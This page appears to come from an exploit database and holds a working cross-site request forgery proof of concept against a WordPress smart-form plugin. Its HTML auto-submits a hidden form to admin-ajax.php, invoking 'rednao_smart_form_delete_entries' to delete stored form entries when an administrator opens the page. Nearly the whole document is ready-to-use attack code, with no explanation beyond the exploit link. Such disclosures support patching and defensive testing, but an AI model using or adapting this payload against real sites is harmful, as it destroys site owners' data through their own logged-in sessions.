Share
## https://sploitus.com/exploit?id=WPEX-ID:B514B631-C3E3-4793-AB5D-35ED0C38B011
<!DOCTYPE html>
<html>
  <body>
    <script>
      const formData = new FormData();
      formData.append('action', 'rednao_smart_form_delete_entries');
      formData.append('data', '{"Ids":["1","2"]}');

      const csrfForm = document.createElement('form');
      csrfForm.method = 'POST';
      csrfForm.action = 'https://example.com/wp-admin/admin-ajax.php';
      csrfForm.enctype = 'multipart/form-data';

      const boundary = '----WebKitFormBoundaryAFcqGF5eShv7ARup';
      csrfForm.setAttribute('boundary', boundary);

      for (const pair of formData) {
        const input = document.createElement('input');
        input.type = 'hidden';
        input.name = pair[0];
        input.value = pair[1];
        csrfForm.appendChild(input);
      }

      document.body.appendChild(csrfForm);
      csrfForm.submit();
    </script>
  </body>
</html>